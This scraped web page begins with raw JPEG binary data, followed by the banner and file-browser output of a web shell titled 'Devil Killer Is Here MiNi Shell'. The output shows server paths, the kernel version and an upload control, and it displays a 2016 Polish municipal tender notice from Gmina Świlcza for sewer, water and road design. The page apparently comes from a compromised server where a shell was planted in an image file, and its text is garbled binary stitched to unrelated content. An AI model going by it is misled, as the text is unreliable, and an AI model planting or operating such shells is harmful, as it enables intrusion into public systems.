JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160804/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160804/300364-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 300364 - 2016
              z dnia 2016-08-04 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Świlcza: Opracowanie dokumentacji techniczno  prawnej zadania inwestycyjnego pod nazwą: Tworzenie warunków dla rozwoju przedsiębiorczości na terenie Gminy Świlcza (Strefa Aktywności Gospodarczej) poprzez uzbrojenie trenów inwestycyjnych w Świlczy 
dz. 1079/2, 1079/3, 1079/4 w zakresie sieci kanalizacji sanitarnej, sieci wodociągowej, dróg dojazdowych ze zjazdami na drogi powiatowe

<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej lub wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Prawo zamówień publicznych, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych::</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Świlcza, krajowy numer identyfikacyjny
              69058214000000, ul.
              Świlcza 
              168,
              36072  
              Świlcza, woj.
              podkarpackie, państwo
              , tel.
              017 8670100, 8670133, e-mail
              , faks
              178 670 157.
              <br />
              adres strony internetowej  www.swilcza.i-gmina.pl<br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów zamówienia można uzyskać pod adresem (URL)</b><div style="padding-left: 20px"><br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.swilcza.i-gmina.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px"><br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px"><br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br /><br /><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemnie<br />
                Pod adres:
                <br />Urząd Gminy Świlcza, 36-072 Świlcza 168, pok. nr 22 - sekretariat na  II piętrze</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnodostępne </b><div style="padding-left: 20px"><br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Opracowanie dokumentacji techniczno  prawnej zadania inwestycyjnego pod nazwą: Tworzenie warunków dla rozwoju przedsiębiorczości na terenie Gminy Świlcza (Strefa Aktywności Gospodarczej) poprzez uzbrojenie trenów inwestycyjnych w Świlczy 
dz. 1079/2, 1079/3, 1079/4 w zakresie sieci kanalizacji sanitarnej, sieci wodociągowej, dróg dojazdowych ze zjazdami na drogi powiatowe

<br /><b>Numer referencyjny: </b>RGP.271.16.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify" /><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) </b><br /><b>Zamówienie podzielone jest na części:</b><br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia  <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Zakres przedmiotu zamówienia obejmuje:
1. Wykonanie projektu Sieć kanalizacji sanitarnej obejmującego:
a) analizę posiadanych przez Gminę opracowań pod katem przydatności 
i możliwości wykorzystania, (w ciągu 1 tygodnia od podpisania umowy),
b) zaproponowanie rozwiązania uwzględniającego doprowadzenie ścieków do istniejącej oczyszczalni, przepompowanie ścieków do sieci kanalizacyjnej m. Rzeszowa. Przewidywana orientacyjna długość sieci  kanalizacyjna grawitacyjna 0,990 km, kanalizacyjna tłoczna 1,070 km, kanalizacyjna tłoczna tranzytowa do sieci  kanalizacyjnej m. Rzeszowa 3,500km,
c) wykonanie projektu sieci kanalizacji,
d) wykonanie projektu przepompowni ścieków w technologii uzgodnionej 
z ZWiK Świlcza).
e) Wykonanie projektu zasilania przepompowni ścieków,
f) Opracowanie przedmiarów robót i kosztorysów inwestorskich 
z podziałem na rozdziały obejmujące poszczególne elementy.
g) opracowanie specyfikacji ogólnej i szczegółowej wykonania i odbioru robót.
2. Wykonanie projektu Sieć wodociągowa obejmującego:
a) analizę posiadanych przez Gminę opracowań pod katem przydatności 
i możliwości wykorzystania, ( w ciągu 1 tygodnia od podpisania umowy)
b) zaproponowanie rozwiązania. Przewidywana orientacyjna długość sieci 1,180 km.
c) wykonanie projektu sieci wodociągowej
d) opracowanie przedmiarów robót i kosztorysów inwestorskich 
z podziałem na rozdziały obejmujące poszczególne elementy.
e) opracowanie specyfikacji ogólnej i szczegółowej wykonania i odbioru robót.
3. Wykonanie projektu Odwodnienie terenu obejmującego:
a) zaproponowanie rozwiązania, przewidywana orientacyjna długość sieci deszczowej grawitacyjnej 0,750 km.
b) wykonanie projektu sieci kanalizacji deszczowej
c) opracowanie przedmiarów robót i kosztorysów inwestorskich 
z podziałem na rozdziały obejmujące poszczególne elementy.
d) opracowanie specyfikacji ogólnej i szczegółowej wykonania i odbioru robót.
4. Wykonanie projektu Wewnętrzne drogi dojazdowe obejmującego:
a) zaproponowanie rozwiązania,
b) wykonanie projektu dróg wewnętrznych, przewidywana orientacyjna długość wewnętrznych dróg dojazdowych 0,530 km wraz z odwodnieniem drogi i oświetleniem.
c) opracowanie przedmiarów robót i kosztorysów inwestorskich 
z podziałem na rozdziały obejmujące poszczególne elementy.
d) opracowanie specyfikacji ogólnej i szczegółowej wykonania i odbioru robót.
5. Dodatkowe wymagania:
1) Projekt należy sporządzić w 5 egzemplarzach.
2) Przygotowanie materiałów do wniosków o wydanie decyzji 
o lokalizacji inwestycji celu publicznego i decyzji o środowiskowych uwarunkowaniach realizacji inwestycji po uprzednim uzgodnieniu trasy z Gminą Świlcza i właścicielami działek leży po stronie oferenta. (w zakresie wymaganym).
3) Przygotowanie wniosków o wydanie technicznych warunków zasilania z Zakładu Wodociągów i Kanalizacji w Świlczy i PGE Dystrybucja leży po stronie oferenta.
4) Przygotowanie innych koniecznych wniosków do uzgodnienia projektu i uzyskania pozwolenia na budowę leży po stronie oferenta.
5) Przygotowanie podkładów mapowych w zakresie niezbędnym do wykonania opracowania leży po stronie oferenta.
6) Opracowanie wszystkich innych nie wymienionych dokumentów koniecznych do realizacji zamówienia, a nie wymienionych 
w powyższym wyliczeniu, leży po stronie oferenta.
7) Pełnienie nadzoru autorskiego w zakresie określonym przepisami ustawy 
z dnia 7 lipca  1994 r.  Prawo budowlane (Dz.U. z 2013 r. poz. 1409) 
w cenie określonej w ofercie, w tym również przygotowanie ewentualnych wyjaśnień dla uczestników postępowania przetargowego na roboty budowlane odnośnie wykonanej dokumentacji.
8) Dokumentacja projektowa winna być zgodna z przepisami prawa zamówień publicznych w zakresie wymogów opisu przedmiotu zamówienia, w szczególności w zakresie zachowania zasad konkurencji i niedyskryminacji (art. 29 i 30 ustawy Pzp).
9) W przypadku zmian przepisów dotyczących Prawa zamówień publicznych, Prawa budowlanego, Prawa energetycznego, Prawa wodnego, Prawa ochrony środowiska wykonawca ma obowiązek wykonać przedmiot umowy zgodnie z obowiązującymi na dzień przekazania zamawiającemu przedmiotu umowy.
10) Wykonawca wykona przedmiot zamówienia z należytą starannością 
w sposób zgodny z obowiązującymi przepisami.
11) Wykonawca zapewni wykonanie dokumentacji projektowej przez osoby posiadające odpowiednie uprawnienia.
12) Wykonawca przedłoży aktualne zaświadczenia potwierdzające przynależność do właściwej izby samorządu zawodowego projektantów 
i sprawdzających (jeżeli wymagany jest sprawdzający).
6. Wykonawca wykona przedmiot zamówienia zgodnie z podjętą przez Radę Gminy Świlcza uchwałą Nr XXVII/183/2016 z dnia 30 lipca 2016 r. w sprawie zmiany miejscowego planu zagospodarowania przestrzennego Nr 3/2006 
w miejscowości Świlcza i Rudna Wielka obejmującej swym zakresem działki 
nr 1079/2, 1079/3 i 1079/4, a następnie opublikowaną w Dzienniku Urzędowym Województwa Podkarpackiego. Uchwała Rady Gminy Świlcza Nr XXVII/183/2016 z dnia 30 lipca 2016 r. w sprawie zmiany miejscowego planu zagospodarowania przestrzennego Nr 3/2006 w miejscowości Świlcza i Rudna Wielka stanowi załącznik do siwz.
<br /><br /><b>II.5) Główny kod CPV: </b>71220000-6<br /><b>
                II.6) Całkowita wartość zamówienia <i>(jeżeli zamawiający podaje informacje o wartości zamówienia</i>:
              </b>
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/10/2016<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Strony mają prawo do przedłużenia terminu realizacji przedmiotu zamówienia o okres trwania przyczyn, z powodu których będzie zagrożone dotrzymanie terminu zakończenia umowy, np. wystąpią opóźnienia w dokonaniu określonych czynności lub ich zaniechanie przez właściwe organy administracji państwowej, które nie są następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność, np. przedłużająca się procedura związana z opublikowaniem uchwały Rady Gminy Świlcza Nr XXVII/183/2016 z dnia 30 lipca 2016 r. w sprawie zmiany miejscowego planu zagospodarowania przestrzennego 
Nr 3/2006 w miejscowości Świlcza i Rudna Wielka w Dzienniku Urzędowym Województwa Podkarpackiego.
</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Nie dotyczy<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Nie dotyczy<br />
                Informacje dodatkowe
                <b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Nie dotyczy<br />
                Czy zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br /></div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1. Wykaz oświadczeń lub dokumentów wymaganych przez zamawiającego, potwierdzających brak podstaw wykluczenia:  
1) oświadczenie wykonawcy, że nie podlega wykluczeniu z postępowania (według załączonego wzoru  załącznik nr 2 do SIWZ)
W przypadku wspólnego ubiegania się o zamówienie przez wykonawców oświadczenie składa każdy z wykonawców wspólnie ubiegających się o zamówienie.  
2) oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej,  o której mowa w art. 24 ust. 1 pkt 23 ustawy (według załączonego wzoru  załącznik nr 3 do SIWZ) oraz, w przypadku przynależności do tej samej grupy kapitałowej, dowody potwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu
W przypadku wspólnego ubiegania się o zamówienie przez wykonawców oświadczenie składa każdy z wykonawców wspólnie ubiegających się o zamówienie.
2. Informacje o sposobie przygotowania wyżej wymienionych dokumentów:  
1) dokumenty, o których mowa w pkt 1, przyjmujące formę załączników do oferty wykonawcy, muszą być złożone pisemnie, z tym że:
 oświadczenia, o których mowa w SIWZ dotyczące wykonawcy i innych podmiotów, na których zdolnościach lub sytuacji polega wykonawca na zasadach określonych w art. 22a ustawy oraz dotyczące podwykonawców, składane są w oryginale; 
 dokumenty, o których mowa w SIWZ, inne niż oświadczenia, o których mowa  w tiret pierwsze, składane są w oryginale lub kopii potwierdzonej za zgodność  z oryginałem.
2) Dokumenty złożone w formie kopii muszą być potwierdzone za zgodność z oryginałem.  Poświadczenia za zgodność z oryginałem dokonuje odpowiednio wykonawca, podmiot, na którego zdolnościach lub sytuacji polega wykonawca, wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego albo podwykonawca, w zakresie dokumentów, które każdego z nich dotyczą.
3) Dokumenty sporządzone w języku obcym muszą zostać złożone wraz z tłumaczeniem na język polski. Dokumenty nie przetłumaczone na język polski nie będą brane pod uwagę. 
4) Potwierdzenie za zgodność z oryginałem winno być sporządzone w sposób umożliwiający identyfikację podpisu  tzn. poprzez złożenie czytelnego podpisu lub parafki wraz z imienną pieczątką osoby poświadczającej kopię dokumentu za zgodność z oryginałem, np.: poświadczam za zgodność z oryginałem ....................................... podpis(y) osoby (osób) uprawnionej(ych) oraz pieczątka(i) imienna(e) lub/i firmowa. 
5) Jeżeli dany dokument składa się z więcej niż jednej strony, dla swej ważności powinien być złożony w całości. 
6) W przypadku, gdy kopia złożonego dokumentu składa się z więcej niż jednej strony, zalecane jest aby każda ze stron tej kopii była potwierdzona za zgodność z oryginałem, zgodnie  z powyższymi wymogami dotyczącymi potwierdzania kopii dokumentów  wymagane jest, aby kopia dokumentu była potwierdzona za zgodność z oryginałem na ostatniej stronie. 
7) Dodatkowe informacje: pożądane jest, aby oświadczenie, którego wzór stanowi załącznik nr 2 do SIWZ zostało sporządzone na tym formularzu lub na kserokopii sporządzonej z tego druku (bądź w formie tego druku).  
3. Termin składania dokumentów lub oświadczeń wymaganych przez zamawiającego:   
1) Oświadczenie o nie podleganiu wykluczeniu z postępowania w postępowaniu wykonawca składa wraz z ofertą.
2) Oświadczenie lub dowody, o których mowa w pkt 1 ppkt 2) Wykonawca przekazuje zamawiającemu, w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji,  o której mowa w art. 86 ust. 5 ustawy Pzp.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Nie dotyczy<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br />Nie otyczy</div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">Nie dotyczy</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Nie dotyczy</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1. Zamawiający wymaga wniesienia wadium. Wykonawca jest zobowiązany do wniesienia wadium w wysokości 4 000,00 zł (słownie: cztery tysiące złotych).
Wadium wnosi się przed upływem terminu składania ofert.
2. Wadium może być wnoszone w jednej lub kilku następujących formach:
a) pieniądzu; 
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; 
c) gwarancjach bankowych; 
d) gwarancjach ubezpieczeniowych; 
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.). 
Dokumenty o których mowa w pkt  b, c, d, e należy w oryginale złożyć 
w kasie Urzędu Gminy w Świlczy a kopie wpiąć do oferty przed upływem terminu składania ofert.
4. Wadium wnoszone w pieniądzu musi znaleźć się na rachunku bankowym Zamawiającego przed terminem składania ofert. Za datę wniesienia wadium uważa się datę uznania wskazanego rachunku bankowego, tj. datę faktycznego wpływu środków finansowych na podany rachunek bankowy Zamawiającego. 
5. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy: 
Nr 92 9159 1023 2005 5000 0026 0074 Bank Spółdzielczy w Głogowie Młp. Oddział w Świlczy z dopiskiem: Przetarg o znaku RGP.271.16.2016
Kopię potwierdzenia przelewu należy dołączyć do oferty lub złożyć w kasie Urzędu Gminy Świlcza.
6. Jeżeli wadium jest wnoszone w pieniądzu prosi się o podanie numeru rachunku bankowego, na który zamawiający ma dokonać zwrotu wadium. 
7. W treści wadium składanego w formie innej niż pieniądz muszą być wyszczególnione okoliczności, w jakich Zamawiający może zatrzymać wadium wraz z odsetkami. Okoliczności te muszą zawierać sytuacje określone: 
1) w art. 46 ust. 4a ustawy Prawo zamówień publicznych, tj. jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Prawo zamówień publicznych, lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie, 
2) w art. 46 ust. 5 ustawy Prawo zamówień publicznych, tj.: jeżeli Wykonawca, którego oferta została wybrana: 
a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 
b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; 
c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe 
z przyczyn leżących po stronie Wykonawcy. 
8. Z powyższego dokumentu powinno ponadto wynikać jednoznacznie, gwarantowanie wypłaty należności w sposób nieodwołalny, bezwarunkowy 
i na pierwsze żądanie. 
9 Wadium powinno obejmować cały okres związania ofertą, poczynając od daty składania ofert. 
10. Wadium wnoszone w formie poręczeń lub gwarancji powinno być złożone 
w oryginale. 
11. Wadium wniesione przez jednego z uczestników konsorcjum uważa się za wniesione prawidłowo. 
12. Zwrot wadium: Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza z uwzględnieniem postanowień art. 46 ustawy Prawo zamówień publicznych.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
